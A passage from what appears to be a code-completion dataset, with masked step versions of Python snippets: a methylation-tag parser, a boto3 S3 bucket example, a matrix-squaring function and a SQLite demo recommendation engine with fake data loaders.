table=pd.DataFrame(data, columns=['read_name', 'strand', 'pos', 'quality', 'mod'])\n .astype(dtype={'mod': 'category', 'quality': 'float'})\n .sort_values(['read_name', 'pos']),\n data_type=\"ont-cram\",\n name=name,\n called_sites=len(data))\n\n\ndef get_modified_reference_positions(read):\n if read.has_tag('MM'):\n basemod = read.get_tag('MM').split(',', 1)[0]\n if '-' in basemod:\n sys.exit(\"ERROR: modifications on negative strand currently unsupported.\")\n base, mod = basemod.split('+')\n deltas = [int(i) for i in read.get_tag('MM').split(',')[1:]]\n probabilities = phred_to_probability(read.get_tag('MP'))\n locations = np.cumsum(deltas) + np.concatenate(\n (np.zeros(shape=1),\n np.ones(shape=len(deltas) - 1))).astype('int')\n base_index = np.array(\n [i for i, letter in enumerate(read.get_forward_sequence()) if letter == base]\n )\n modified_bases = base_index[locations]\n refpos = np.array(read.get_reference_positions(full_length=True))\n if read.is_reverse:\n refpos = np.flipud(refpos)\n probabilities = probabilities[::-1]\n return (basemod, refpos[modified_bases], probabilities)\n else:\n return (None, [None], [None])\n\n\ndef errs_tab(n):\n \"\"\"Generate list of error rates for qualities less than equal than n.\"\"\"\n return [10**(q / -10) for q in range(n + 1)]\n\n\ndef phred_to_probability(quals, tab=errs_tab(128)):\n return [tab[ord(q) - 33] for q in quals]\n\n\ndef get_data(methylation_files, names, window, smoothen=5):\n \"\"\"\n Import methylation data from all files in the list methylation_files\n\n Data can be either frequency or raw.\n\n data is extracted within the window args.window\n Frequencies are smoothened using a sliding window\n \"\"\"\n return [read_meth(f, n, window, smoothen) for f, n in zip(methylation_files, names)]\n",
"step-ids": [
5,
8,
10,
11,
12
]
}
|
[
5,
8,
10,
11,
12
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
s3_resource.create_bucket(Bucket=YOUR_BUCKET_NAME,
CreateBucketConfiguration={'LocationConstraint': 'eu-west-1'})
s3_resource.Bucket(first_bucket_name).upload_file(Filename=first_file_name,
Key=first_file_name)
s3_resource.Object(second_bucket_name, first_file_name).delete()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
s3_resource = boto3.resource('s3')
s3_resource.create_bucket(Bucket=YOUR_BUCKET_NAME,
CreateBucketConfiguration={'LocationConstraint': 'eu-west-1'})
s3_resource.Bucket(first_bucket_name).upload_file(Filename=first_file_name,
Key=first_file_name)
s3_resource.Object(second_bucket_name, first_file_name).delete()
<|reserved_special_token_1|>
import boto3
s3_resource = boto3.resource('s3')
s3_resource.create_bucket(Bucket=YOUR_BUCKET_NAME,
CreateBucketConfiguration={'LocationConstraint': 'eu-west-1'})
s3_resource.Bucket(first_bucket_name).upload_file(Filename=first_file_name,
Key=first_file_name)
s3_resource.Object(second_bucket_name, first_file_name).delete()
<|reserved_special_token_1|>
# proper clarification for requirement is required
# NOTE(review): this snippet is not runnable as written — YOUR_BUCKET_NAME,
# first_bucket_name, first_file_name and second_bucket_name are undefined
# placeholders that must be assigned (or passed in) before use.
import boto3
# Create an S3 service resource using the default AWS credential chain.
s3_resource = boto3.resource('s3')
# Buckets outside us-east-1 require an explicit LocationConstraint.
s3_resource.create_bucket(Bucket=YOUR_BUCKET_NAME, CreateBucketConfiguration={'LocationConstraint': 'eu-west-1'})
# Upload the local file, reusing its filename as the object key.
s3_resource.Bucket(first_bucket_name).upload_file(Filename=first_file_name, Key=first_file_name)
# Delete the same-named object from the second bucket.
s3_resource.Object(second_bucket_name, first_file_name).delete()
|
flexible
|
{
"blob_id": "44097da54a0bb03ac14196712111a1489a956689",
"index": 5387,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ns3_resource.create_bucket(Bucket=YOUR_BUCKET_NAME,\n CreateBucketConfiguration={'LocationConstraint': 'eu-west-1'})\ns3_resource.Bucket(first_bucket_name).upload_file(Filename=first_file_name,\n Key=first_file_name)\ns3_resource.Object(second_bucket_name, first_file_name).delete()\n",
"step-3": "<mask token>\ns3_resource = boto3.resource('s3')\ns3_resource.create_bucket(Bucket=YOUR_BUCKET_NAME,\n CreateBucketConfiguration={'LocationConstraint': 'eu-west-1'})\ns3_resource.Bucket(first_bucket_name).upload_file(Filename=first_file_name,\n Key=first_file_name)\ns3_resource.Object(second_bucket_name, first_file_name).delete()\n",
"step-4": "import boto3\ns3_resource = boto3.resource('s3')\ns3_resource.create_bucket(Bucket=YOUR_BUCKET_NAME,\n CreateBucketConfiguration={'LocationConstraint': 'eu-west-1'})\ns3_resource.Bucket(first_bucket_name).upload_file(Filename=first_file_name,\n Key=first_file_name)\ns3_resource.Object(second_bucket_name, first_file_name).delete()\n",
"step-5": "#proper clarification for requirement is required\nimport boto3\ns3_resource = boto3.resource('s3')\ns3_resource.create_bucket(Bucket=YOUR_BUCKET_NAME, CreateBucketConfiguration={'LocationConstraint': 'eu-west-1'})\ns3_resource.Bucket(first_bucket_name).upload_file(Filename=first_file_name, Key=first_file_name)\ns3_resource.Object(second_bucket_name, first_file_name).delete()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def square_matrix_simple(matrix=[]):
    """Return a new matrix holding the square of every integer in `matrix`.

    Note: the previous docstring said "square root", but the code computes
    element ** 2, i.e. the square.  The input matrix is left unmodified.
    """
    new_matrix = []
    for index in matrix:  # `index` is actually a row (list) of the matrix
        jndex = 0
        new_row = []
        while jndex < len(index):
            new_row.append(index[jndex] ** 2)  # square, not square root
            jndex += 1
        new_matrix.append(new_row)
    return new_matrix
<|reserved_special_token_1|>
#!/usr/bin/python3
def square_matrix_simple(matrix=[]):
    """Return a new matrix with the square of every integer of `matrix`.

    The input matrix is left unmodified; a brand-new list of lists is
    returned.  (The previous docstring claimed "square root", but the code
    squares each element.)  The mutable default is kept for interface
    compatibility; it is never mutated.
    """
    return [[element ** 2 for element in row] for row in matrix]
|
flexible
|
{
"blob_id": "b090e92fe62d9261c116529ea7f480daf8b3e84e",
"index": 6543,
"step-1": "<mask token>\n",
"step-2": "def square_matrix_simple(matrix=[]):\n \"\"\"This function will compute the square root of all integers in\n a matrix. \"\"\"\n new_matrix = []\n for index in matrix:\n jndex = 0\n new_row = []\n while jndex < len(index):\n new_row.append(index[jndex] ** 2)\n jndex += 1\n new_matrix.append(new_row)\n return new_matrix\n",
"step-3": "#!/usr/bin/python3\ndef square_matrix_simple(matrix=[]):\n\n '''This function will compute the square root of all integers in\n a matrix. '''\n\n new_matrix = []\n\n for index in matrix:\n jndex = 0\n new_row = []\n while jndex < len(index):\n new_row.append(index[jndex] ** 2)\n jndex += 1\n new_matrix.append(new_row)\n return new_matrix\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
__author__ = 'tomer'
import sqlite3
from random import randint
import test_data
def init_database(conn):
    """Create the demo recommendation schema on `conn` (idempotent).

    Tables: catalogs, products, users, products_bought, product_context and
    recommendations.  Every statement uses IF NOT EXISTS, so calling this
    against an already-initialised database is a no-op.
    """
    cur = conn.cursor()
    # Product catalogs (e.g. one per retailer).
    cur.execute('''CREATE TABLE IF NOT EXISTS catalogs
             (id INTEGER PRIMARY KEY AUTOINCREMENT, catalog_name TEXT)''')
    # Products, each belonging to a catalog via catalog_id.
    cur.execute('''CREATE TABLE IF NOT EXISTS products
             (id INTEGER PRIMARY KEY AUTOINCREMENT, sku_id INTEGER, catalog_id INTEGER, product_name TEXT, price FLOAT, description TEXT)''')
    # Known users.
    cur.execute('''CREATE TABLE IF NOT EXISTS users
             (id INTEGER PRIMARY KEY AUTOINCREMENT, user_name TEXT)''')
    # Purchase history: which user bought which product.
    cur.execute('''CREATE TABLE IF NOT EXISTS products_bought
             (id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER,product_id INTEGER)''')
    # Context captured alongside each recommendation (device, time, geo, cart state).
    cur.execute('''CREATE TABLE IF NOT EXISTS product_context
             (id INTEGER PRIMARY KEY AUTOINCREMENT,recommendation_id INTEGER, product_id INTEGER, device TEXT, os TEXT, time_of_day TEXT, day_of_week TEXT, latitude float, longitude float,num_items_in_cart INTEGER, purchases_in_last_month INTEGER)''')
    # Recommendations shown to users and whether they were interacted with.
    cur.execute('''CREATE TABLE IF NOT EXISTS recommendations
             (id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER, product_id INTEGER, interacted BOOLEAN)''')
def load_fake_data(conn):
    """Wipe all tables and repopulate them with random fixture data.

    Inserts 2 catalogs, 6 users, 19 products, 49 purchases (each with a
    context row) and 999 interacted recommendations (each with a context
    row).  Relies on the module-level vocabulary lists (device, oses,
    times, days, lats, lons) and commits once at the end.
    """
    c = conn.cursor()
    # Start from a clean slate; DELETE keeps the tables but drops all rows.
    c.execute('''DELETE FROM catalogs''')
    c.execute('''DELETE FROM products''')
    c.execute('''DELETE FROM users''')
    c.execute('''DELETE FROM products_bought''')
    c.execute('''DELETE FROM product_context''')
    c.execute('''DELETE FROM recommendations''')
    # Two catalogs; collect the AUTOINCREMENT ids via lastrowid.
    catalogs = []
    c.execute('''INSERT INTO catalogs (catalog_name) VALUES (?)''',('BestBuy',))
    catalogs.append(c.lastrowid)
    c.execute('''INSERT INTO catalogs (catalog_name) VALUES (?)''',('RiteAid',))
    catalogs.append(c.lastrowid)
    # Six named users.
    ppl = []
    c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Tomer',))
    ppl.append(c.lastrowid)
    c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Alex',))
    ppl.append(c.lastrowid)
    c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Matt',))
    ppl.append(c.lastrowid)
    c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Rachael',))
    ppl.append(c.lastrowid)
    c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Sam',))
    ppl.append(c.lastrowid)
    c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Joey',))
    ppl.append(c.lastrowid)
    products = []
    # Load fake products (random sku, random catalog, random price).
    for i in range(1,20):
        c.execute('''INSERT INTO products (id,sku_id,catalog_id, product_name, price,description) VALUES (NULL,?,?,?,?,?)''',(randint(1,2000),catalogs[randint(0,len(catalogs)-1)],'Movie' + str(i),randint(1,2000),'Title' + str(i)))
        products.append(c.lastrowid)
    # Load fake transactions, each paired with a random context row.
    # NOTE(review): here recommendation_id is set to the products_bought
    # rowid (not a recommendations id) and product_id is omitted — looks
    # like a data-modelling quirk; confirm before relying on this link.
    for i in range(1,50):
        c.execute('''INSERT INTO products_bought (id,user_id, product_id) VALUES (NULL,?,?)''',(ppl[randint(0,len(ppl)-1)],products[randint(0,len(products)-1)]))
        values = (c.lastrowid,device[randint(0,len(device)-1)],oses[randint(0,len(oses)-1)], times[randint(0,len(times)-1)], days[randint(0,len(days)-1)], lats[randint(0,len(lats)-1)], lons[randint(0,len(lons)-1)],randint(0,5),randint(0,30))
        c.execute('''INSERT INTO product_context (id,recommendation_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?)''',values)
    # Load fake recommendations, all flagged as interacted ('true'),
    # each with a full context row keyed by the recommendation's rowid.
    for i in range(1,1000):
        product_id = products[randint(0, len(products) - 1)]
        c.execute('''INSERT INTO recommendations (id,user_id, product_id, interacted) VALUES (NULL,?,?,'true')''',(ppl[randint(0,len(ppl)-1)],product_id))
        values = (c.lastrowid,product_id,device[randint(0,len(device)-1)],oses[randint(0,len(oses)-1)], times[randint(0,len(times)-1)], days[randint(0,len(days)-1)], lats[randint(0,len(lats)-1)], lons[randint(0,len(lons)-1)],randint(0,3),randint(0,3))
        c.execute('''INSERT INTO product_context (id,recommendation_id , product_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)''',values)
    conn.commit()
# Vocabulary lists used to fabricate random context features for the fake
# data loaders and generate_context().  Each recommendation/purchase gets
# one value drawn uniformly from each list.  Richer vocabularies (more
# OSes, clock times, GPS coordinates, weekdays) were tried previously and
# are preserved below as comments for future reinstatement.
oses = ['IOS', 'Android']  # disabled: 'Windows10', 'macOS'
device = ['mobile']  # disabled: 'computer'
# Disabled clock-time vocabulary:
#   '10:33 AM', '2:38 PM', '3:01 AM', '12:31 AM', '2:56 PM',
#   '8:01 AM', '5:00 PM', '9:38 PM', '3:01 AM'
times = ['morning', 'afternoon', 'night']
days = ['M']  # disabled: 'T', 'W', 'R', 'F', 'S', 'Su'
# Disabled latitude vocabulary (Anchorage-area longitudes, mislabelled):
#   '-149.8935557', '-149.9054948', '-149.7522', '-149.8643361',
#   '-149.8379726', '-149.9092788', '-149.7364877', '-149.8211',
#   '-149.8445832', '-149.9728678'
lats = ['north']  # disabled: 'south'
# Disabled longitude vocabulary:
#   '61.21759217', '61.19533942', '61.2297', '61.19525062', '61.13751355',
#   '61.13994658', '61.19533265', '61.2156', '61.13806145', '61.176693'
lons = ['east']  # disabled: 'west'
def get_users(conn):
    """Return every row of the ``users`` table as (id, user_name) tuples."""
    cur = conn.cursor()
    return cur.execute('select * from users').fetchall()
def get_catalogs(conn):
    """Return every row of the ``catalogs`` table as (id, catalog_name) tuples."""
    cur = conn.cursor()
    return cur.execute('select * from catalogs').fetchall()
def get_products(conn, catalog_id):
    """Return all product rows that belong to the catalog *catalog_id*."""
    cur = conn.cursor()
    return cur.execute('select * from products where catalog_id = ?', (catalog_id,)).fetchall()
def get_product_by_id(conn, catalog_id, product_id):
    """Fetch the product row matching (*catalog_id*, *product_id*); empty list if none."""
    cur = conn.cursor()
    return cur.execute('SELECT * FROM products WHERE catalog_id = ? AND id = ?', (catalog_id, product_id)).fetchall()
def get_products_bought(conn, catalog_id):
    """Return purchase rows (id, user_id, product_id) for products in *catalog_id*.

    Bug fix: the original FROM clause also listed ``catalogs cat`` without
    any join condition on it, producing a cartesian product that duplicated
    every purchase row once per catalog in the table.  The unused table is
    dropped; the filter on ``p.catalog_id`` already scopes the result.
    """
    c = conn.cursor()
    c.execute('''select pb.* from products_bought pb, products p where pb.product_id = p.id and p.catalog_id = ?''',(catalog_id,))
    return c.fetchall()
def get_all_data(conn):
    """Join users, products and catalogs through products_bought.

    Returns one row per purchase: the buyer's columns, then the product's,
    then the catalog's.
    """
    cur = conn.cursor()
    rows = cur.execute('select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id').fetchall()
    return rows
def get_data_for_user(conn, userid):
    """Like get_all_data, but restricted to purchases made by *userid*."""
    cur = conn.cursor()
    return cur.execute('select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and u.id = ?', (userid,)).fetchall()
def get_data_for_user_and_catalog(conn, userid, catalogid):
    """Purchase rows for one user restricted to one catalog (see get_all_data)."""
    cur = conn.cursor()
    return cur.execute('select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and u.id = ? and c.id = ?', (userid, catalogid)).fetchall()
def get_transactions_for_catalog(conn, catalogid):
    """All purchase rows (user, product, catalog columns) within *catalogid*."""
    cur = conn.cursor()
    return cur.execute('select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and c.id = ?', (catalogid,)).fetchall()
def get_recommendations_by_user(conn, userId):
    """Every recommendation shown to *userId*, joined with its context row."""
    cur = conn.cursor()
    return cur.execute('select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.user_id = ?', (userId,)).fetchall()
def get_recommendations_by_product(conn, productId):
    """Every recommendation of *productId*, joined with its context row."""
    cur = conn.cursor()
    return cur.execute('select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.product_id = ?', (productId,)).fetchall()
def get_connection():
    """Open (creating on first use) the engine's on-disk SQLite database.

    The file 'recommendation_engine.db' is created in the current working
    directory if it does not exist; callers own the returned connection.
    """
    return sqlite3.connect('recommendation_engine.db')
def generate_context(product_id):
    """Build a random context feature list for *product_id*.

    Returns [product_id, device, os, time_of_day, day_of_week, latitude,
    longitude, num_items_in_cart, purchases_in_last_month], each categorical
    value drawn uniformly from the module-level vocabulary lists.  The list
    is in the column order expected by add_recommendation(), which prepends
    the recommendation id before inserting into product_context.
    """
    return [product_id, device[randint(0, len(device) - 1)], oses[randint(0, len(oses) - 1)],
            times[randint(0, len(times) - 1)], days[randint(0, len(days) - 1)], lats[randint(0, len(lats) - 1)],
            lons[randint(0, len(lons) - 1)], randint(0, 3), randint(0, 3)]
def add_recommendation(conn, product_ids,user_ids,contexts):
    """Record a batch of recommendations with their contexts and return them.

    *product_ids*, *user_ids* and *contexts* are parallel lists; contexts[i]
    must be the 9-element list produced by generate_context().  Each context
    list is MUTATED in place: the new recommendation's rowid is inserted at
    position 0 so it matches the product_context column order.  Commits once,
    then re-selects and returns the joined rows just written.
    """
    ids = []
    c = conn.cursor()
    for i in range(0,len(product_ids)):
        product_id = product_ids[i]
        user_id = user_ids[i]
        context = contexts[i]
        # New recommendations start un-interacted ('false').
        c.execute('''INSERT INTO recommendations (id,user_id, product_id, interacted) VALUES (NULL,?,?,'false')''',
                  (user_id, product_id))
        # Link the context row to the recommendation just created.
        context.insert(0,c.lastrowid)
        ids.append(c.lastrowid)
        c.execute( '''INSERT INTO product_context (id,recommendation_id , product_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)''',
            context)
    conn.commit()
    # Build an IN (?,?,...) placeholder list sized to the batch; the ids
    # themselves are bound as parameters, so this interpolation is safe.
    c.execute('select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.id in (%s)' %
              ','.join('?'*len(ids)), ids)
    return c.fetchall()
def get_probability(conn, x, giveny):
    """Estimate P(giveny | x) from the product_context table.

    *x* and *giveny* map column names to required values.  The function
    counts rows matching all of *x* (the denominator), then rows matching
    *x* AND *giveny* (the numerator), and returns numerator/denominator,
    or 0 when no row matches *x*.

    NOTE(review): the dict KEYS are interpolated directly into the SQL
    text (only the values are bound as parameters), so callers must pass
    trusted column names — untrusted keys would allow SQL injection.
    """
    c = conn.cursor()
    query = '''select count(*) from product_context where '''
    first = True
    params = []
    # Denominator: rows matching every condition in x.
    for key,val in x.items():
        if not first:
            query += ' and '
        else:
            first = False
        query += str(key) + '=?'
        params.append(str(val))
    c.execute(query,params)
    total = c.fetchone()[0]
    # Numerator: extend the same query with the giveny conditions.
    for key,val in giveny.items():
        query += ' and ' + str(key) + '=?'
        params.append(str(val))
    c.execute(query,params)
    smaller = c.fetchone()[0]
    if total == 0:
        # No evidence for x at all; report zero rather than dividing by 0.
        return 0
    else:
        return smaller/float(total)
def load_test_data(conn):
    """Wipe all tables and repopulate them from the ``test_data`` module.

    Uses test_data.USER_NAMES, PRODUCT_NAMES and POSSIBLE_PRICES to build a
    single 'MovieDatabase' catalog, then fabricates 49 purchases and 999
    interacted recommendations with random context rows (vocabularies come
    from the module-level lists).  Commits once at the end.
    """
    c = conn.cursor()
    # Clear database
    c.execute('''DELETE FROM catalogs''')
    c.execute('''DELETE FROM products''')
    c.execute('''DELETE FROM users''')
    c.execute('''DELETE FROM products_bought''')
    c.execute('''DELETE FROM product_context''')
    c.execute('''DELETE FROM recommendations''')
    # Initialize users
    user_names = test_data.USER_NAMES
    # Initialize movie names
    product_names = test_data.PRODUCT_NAMES
    # Initialize Prices
    prices = test_data.POSSIBLE_PRICES
    # Load test catalog (a single catalog; its id seeds every product row)
    catalog_ids = []
    c.execute('''INSERT INTO catalogs (catalog_name) VALUES (?)''', ('MovieDatabase',))
    catalog_ids.append(c.lastrowid)
    # Load test users
    user_ids = []
    for user in user_names:
        c.execute('''INSERT INTO users (user_name) VALUES (?)''', (user,))
        user_ids.append(c.lastrowid)
    # Load test products (random sku and price per name)
    product_ids = []
    for product in product_names:
        values = (randint(1, 2000), catalog_ids[0], product, prices[randint(0, len(prices)-1)], 'desc')
        c.execute('''INSERT INTO products (id, sku_id, catalog_id, product_name, price, description) VALUES (NULL,?,?,?,?,?)''', values)
        product_ids.append(c.lastrowid)
    # Load fake transactions
    # NOTE(review): as in load_fake_data, recommendation_id here is the
    # products_bought rowid and product_id is omitted — confirm this
    # cross-table linkage is intentional.
    for i in range(1, 50):
        values = (user_ids[randint(0, len(user_ids)-1)], product_ids[randint(0, len(product_ids)-1)])
        c.execute('''INSERT INTO products_bought (id,user_id,product_id) VALUES (NULL,?,?)''', values)
        values = (c.lastrowid,
                  device[randint(0, len(device) - 1)],
                  oses[randint(0, len(oses) - 1)],
                  times[randint(0, len(times) - 1)],
                  days[randint(0, len(days) - 1)],
                  lats[randint(0, len(lats) - 1)],
                  lons[randint(0, len(lons) - 1)],
                  randint(0, 3),
                  randint(0, 3))
        c.execute('''INSERT INTO product_context (id,recommendation_id,device,os,time_of_day,day_of_week,latitude,longitude,num_items_in_cart,purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?)''', values)
    # Load fake recommendations (all marked interacted = 'True')
    for i in range(1, 1000):
        product_id = product_ids[randint(0, len(product_ids)-1)]
        values = (user_ids[randint(0, len(user_ids)-1)], product_id,)
        c.execute('''INSERT INTO recommendations (id,user_id,product_id,interacted) VALUES (NULL,?,?,'True')''', values)
        values =(c.lastrowid,
                 product_id,
                 device[randint(0, len(device) - 1)],
                 oses[randint(0, len(oses) - 1)],
                 times[randint(0, len(times) - 1)],
                 days[randint(0, len(days) - 1)],
                 lats[randint(0, len(lats) - 1)],
                 lons[randint(0, len(lons) - 1)],
                 randint(0, 3),
                 randint(0, 3))
        c.execute('''INSERT INTO product_context (id,recommendation_id,product_id,device,os,time_of_day,day_of_week,latitude,longitude,num_items_in_cart,purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)''', values)
    conn.commit()
|
normal
|
{
"blob_id": "46b1e5adbd956c35820d7d2b17628364388cdcd7",
"index": 3638,
"step-1": "<mask token>\n\n\ndef init_database(conn):\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS catalogs\n (id INTEGER PRIMARY KEY AUTOINCREMENT, catalog_name TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS products\n (id INTEGER PRIMARY KEY AUTOINCREMENT, sku_id INTEGER, catalog_id INTEGER, product_name TEXT, price FLOAT, description TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS users\n (id INTEGER PRIMARY KEY AUTOINCREMENT, user_name TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS products_bought\n (id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER,product_id INTEGER)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS product_context\n (id INTEGER PRIMARY KEY AUTOINCREMENT,recommendation_id INTEGER, product_id INTEGER, device TEXT, os TEXT, time_of_day TEXT, day_of_week TEXT, latitude float, longitude float,num_items_in_cart INTEGER, purchases_in_last_month INTEGER)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS recommendations\n (id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER, product_id INTEGER, interacted BOOLEAN)\"\"\"\n )\n\n\n<mask token>\n\n\ndef get_users(conn):\n c = conn.cursor()\n c.execute('select * from users')\n return c.fetchall()\n\n\ndef get_catalogs(conn):\n c = conn.cursor()\n c.execute('select * from catalogs')\n return c.fetchall()\n\n\n<mask token>\n\n\ndef get_product_by_id(conn, catalog_id, product_id):\n c = conn.cursor()\n c.execute('SELECT * FROM products WHERE catalog_id = ? 
AND id = ?', (\n catalog_id, product_id))\n return c.fetchall()\n\n\n<mask token>\n\n\ndef get_all_data(conn):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id'\n )\n return c.fetchall()\n\n\ndef get_data_for_user(conn, userid):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and u.id = ?'\n , (userid,))\n return c.fetchall()\n\n\n<mask token>\n\n\ndef get_recommendations_by_product(conn, productId):\n c = conn.cursor()\n c.execute(\n 'select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.product_id = ?'\n , (productId,))\n return c.fetchall()\n\n\n<mask token>\n\n\ndef generate_context(product_id):\n return [product_id, device[randint(0, len(device) - 1)], oses[randint(0,\n len(oses) - 1)], times[randint(0, len(times) - 1)], days[randint(0,\n len(days) - 1)], lats[randint(0, len(lats) - 1)], lons[randint(0, \n len(lons) - 1)], randint(0, 3), randint(0, 3)]\n\n\n<mask token>\n\n\ndef get_probability(conn, x, giveny):\n c = conn.cursor()\n query = 'select count(*) from product_context where '\n first = True\n params = []\n for key, val in x.items():\n if not first:\n query += ' and '\n else:\n first = False\n query += str(key) + '=?'\n params.append(str(val))\n c.execute(query, params)\n total = c.fetchone()[0]\n for key, val in giveny.items():\n query += ' and ' + str(key) + '=?'\n params.append(str(val))\n c.execute(query, params)\n smaller = c.fetchone()[0]\n if total == 0:\n return 0\n else:\n return smaller / float(total)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef init_database(conn):\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS catalogs\n (id INTEGER PRIMARY KEY AUTOINCREMENT, catalog_name TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS products\n (id INTEGER PRIMARY KEY AUTOINCREMENT, sku_id INTEGER, catalog_id INTEGER, product_name TEXT, price FLOAT, description TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS users\n (id INTEGER PRIMARY KEY AUTOINCREMENT, user_name TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS products_bought\n (id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER,product_id INTEGER)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS product_context\n (id INTEGER PRIMARY KEY AUTOINCREMENT,recommendation_id INTEGER, product_id INTEGER, device TEXT, os TEXT, time_of_day TEXT, day_of_week TEXT, latitude float, longitude float,num_items_in_cart INTEGER, purchases_in_last_month INTEGER)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS recommendations\n (id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER, product_id INTEGER, interacted BOOLEAN)\"\"\"\n )\n\n\ndef load_fake_data(conn):\n c = conn.cursor()\n c.execute('DELETE FROM catalogs')\n c.execute('DELETE FROM products')\n c.execute('DELETE FROM users')\n c.execute('DELETE FROM products_bought')\n c.execute('DELETE FROM product_context')\n c.execute('DELETE FROM recommendations')\n catalogs = []\n c.execute('INSERT INTO catalogs (catalog_name) VALUES (?)', ('BestBuy',))\n catalogs.append(c.lastrowid)\n c.execute('INSERT INTO catalogs (catalog_name) VALUES (?)', ('RiteAid',))\n catalogs.append(c.lastrowid)\n ppl = []\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Tomer',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Alex',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Matt',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) 
VALUES (?)', ('Rachael',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Sam',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Joey',))\n ppl.append(c.lastrowid)\n products = []\n for i in range(1, 20):\n c.execute(\n 'INSERT INTO products (id,sku_id,catalog_id, product_name, price,description) VALUES (NULL,?,?,?,?,?)'\n , (randint(1, 2000), catalogs[randint(0, len(catalogs) - 1)], \n 'Movie' + str(i), randint(1, 2000), 'Title' + str(i)))\n products.append(c.lastrowid)\n for i in range(1, 50):\n c.execute(\n 'INSERT INTO products_bought (id,user_id, product_id) VALUES (NULL,?,?)'\n , (ppl[randint(0, len(ppl) - 1)], products[randint(0, len(\n products) - 1)]))\n values = c.lastrowid, device[randint(0, len(device) - 1)], oses[randint\n (0, len(oses) - 1)], times[randint(0, len(times) - 1)], days[\n randint(0, len(days) - 1)], lats[randint(0, len(lats) - 1)], lons[\n randint(0, len(lons) - 1)], randint(0, 5), randint(0, 30)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?)'\n , values)\n for i in range(1, 1000):\n product_id = products[randint(0, len(products) - 1)]\n c.execute(\n \"INSERT INTO recommendations (id,user_id, product_id, interacted) VALUES (NULL,?,?,'true')\"\n , (ppl[randint(0, len(ppl) - 1)], product_id))\n values = c.lastrowid, product_id, device[randint(0, len(device) - 1)\n ], oses[randint(0, len(oses) - 1)], times[randint(0, len(times) -\n 1)], days[randint(0, len(days) - 1)], lats[randint(0, len(lats) -\n 1)], lons[randint(0, len(lons) - 1)], randint(0, 3), randint(0, 3)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id , product_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES 